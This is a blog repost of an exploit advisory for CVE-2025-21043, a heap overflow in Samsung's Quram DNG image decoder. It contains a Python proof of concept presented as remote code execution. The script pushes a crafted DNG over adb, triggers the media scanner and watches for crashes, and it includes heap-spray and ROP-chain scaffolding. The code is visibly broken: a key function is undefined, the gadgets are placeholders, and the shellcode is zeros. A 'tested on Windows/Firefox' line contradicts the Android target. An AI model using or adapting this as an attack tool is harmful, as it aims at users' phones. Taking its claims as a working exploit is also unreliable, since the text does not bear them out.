Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

Samsung Quram DNG Remote Code Execution

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 3
Samsung Quram DNG Remote Code Execution
Samsung Quram DNG Remote Code Execution
Samsung Quram DNG Remote Code Execution

=============================================================================================================================================
| # Title Samsung Quram DNG Remote Code Execution

=============================================================================================================================================
| # Title : Samsung QuramDNG Heap Exploitation via Malformed (libimagecodec.quram.so) |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : System built?in component. No standalone download available. |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/211370/ & CVE-2025-21043

[+] Summary : A vulnerability exists in Samsung?s image decoding library (libimagecodec.quram.so) responsible for parsing Digital Negatives (DNG).
A malformed DNG containing oversized IFD entries can cause heap corruption.
With precise heap grooming, this condition may lead to remote code execution when the malicious DNG is decoded.

[+] Affected Platforms (Likely Impact)

Devices using Quram Codec and containing vulnerable libimagecodec.quram.so, typically:

Galaxy S22 / S23 / S24 series

Galaxy Z Fold / Z Flip

Galaxy A and Tab series

Any Samsung model using Quram decoder before SMR?SEP?2025

[+] OS Builds Affected:

Android builds where the Quram codec is present and security patch level < September 2025

[+] Technical Description (Root Cause)

libimagecodec.quram.so fails to sanitize the size of metadata entries when parsing a DNG file:

The IFD entry count is taken from the attacker-controlled file.

Size validation is missing.

Heap allocator metadata and adjacent buffers may be overwritten.

Controlled overwrite can result in hijacked code execution.

Critical vulnerable function:

doMapPoly16()

located inside Quram image parsing logic.

Instructions For Saving:
------------------------
1) Save file as:
poc.py

Instructions For Running:
-------------------------
python3 poc.py


[+] POC :

import os
import subprocess
import time

class QuramDngExploit:
def __init__(self):
self.malicious_dng = None

def craft_exploit(self):
"""Create DNG with controlled heap layout"""
print("[*] Crafting malicious DNG file...")

dng_data = create_malicious_dng()

return dng_data

def spray_heap(self):
"""Spray heap with controlled objects"""

spray_code = """
import java.util.ArrayList;

public class HeapSpray {
private static ArrayList<byte[]> sprayList = new ArrayList<>();

public static void spray(int count, int size) {
for (int i = 0; i < count; i++) {
byte[] buffer = new byte[size];
// Fill with pointer-like values
for (int j = 0; j < size; j += 8) {
// Address we want to write
buffer[j] = (byte)0x41;
}
sprayList.add(buffer);
}
}
}
"""

def trigger(self):
"""Trigger the vulnerability"""
print("[*] Triggering vulnerability...")

temp_file = "/data/local/tmp/exploit.dng"
with open(temp_file, 'wb') as f:
f.write(self.craft_exploit())

cmd = [
'adb', 'shell',
'am', 'broadcast',
'-a', 'android.intent.action.MEDIA_SCANNER_SCAN_FILE',
'-d', f'file://{temp_file}'
]

subprocess.run(cmd)

print("[*] Waiting for com.samsung.ipservice to process file...")
time.sleep(10)

self.monitor_logcat()

def monitor_logcat(self):
"""Monitor for crash logs"""
print("[*] Monitoring logcat for crashes...")
logcat = subprocess.Popen(
['adb', 'logcat', '-s', 'DEBUG'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)

for line in logcat.stdout:
line = line.decode('utf-8', errors='ignore')
if 'SIGSEGV' in line or 'libimagecodec.quram' in line:
print("[+] Crash detected!")
print(line)
break

def build_rop_chain(self):
"""Build ROP chain for ARM64"""
rop_chain = []
gadgets = {
'pop_x0': 0x123456, # placeholder
'pop_x1': 0x123457,
'system': 0x123458,
'blr_x19': 0x123459,
}

return rop_chain

def achieve_rce(self):
"""Attempt to achieve Remote Code Execution"""
print("[*] Attempting to achieve RCE...")


shellcode = (

b"\x00\x00\x00\x00"
)

return False

if __name__ == "__main__":
exploit = QuramDngExploit()

print("[*] Starting QuramDng exploit (CVE-2025-21043)")
print("[*] Target: libimagecodec.quram.so")
print("[*] Vulnerability: OOB Write in doMapPoly16")

exploit.craft_exploit()

exploit.trigger()

print("[*] Exploit completed")



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Social Media Share